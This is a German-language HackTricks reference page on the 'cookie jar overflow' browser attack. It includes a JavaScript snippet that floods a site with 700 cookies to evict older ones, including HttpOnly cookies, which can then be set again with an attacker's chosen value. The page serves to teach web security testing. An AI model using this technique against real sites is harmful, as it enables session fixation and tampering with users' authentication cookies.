German - Ht
HackTricks Training Twitter Linkedin Sponsor

Cookie Jar Overflow

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

Die Browser haben eine Begrenzung für die Anzahl der Cookies, die sie für eine Seite speichern können. Wenn Sie aus irgendeinem Grund einen Cookie verschwinden lassen müssen, können Sie den Cookie-Jar überlaufen lassen, da die ältesten Cookies zuerst gelöscht werden:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Beachten Sie, dass Cookies von Drittanbietern, die auf eine andere Domain verweisen, nicht überschrieben werden.

Dieser Angriff kann auch verwendet werden, um HttpOnly-Cookies zu überschreiben, da Sie es löschen und dann mit dem gewünschten Wert zurücksetzen können.

Überprüfen Sie dies in diesem Beitrag mit einem Labor.

Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)!

Andere Möglichkeiten, HackTricks zu unterstützen:

PreviousCookie TossingNextCookie Bomb

Last updated